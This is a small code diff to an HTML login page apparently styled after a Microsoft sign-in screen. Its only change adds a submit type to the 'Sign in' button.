--- a/microsoft-login/index2.html
+++ b/microsoft-login/index2.html
@@ -30,7 +30,7 @@
                 </p>
             </div>
             <div>
-                <button class="btn" id="btn_sig">Sign in</button>
+                <button class="btn" id="btn_sig" type="submit">Sign in</button>
             </div>
         </div>
     </section>
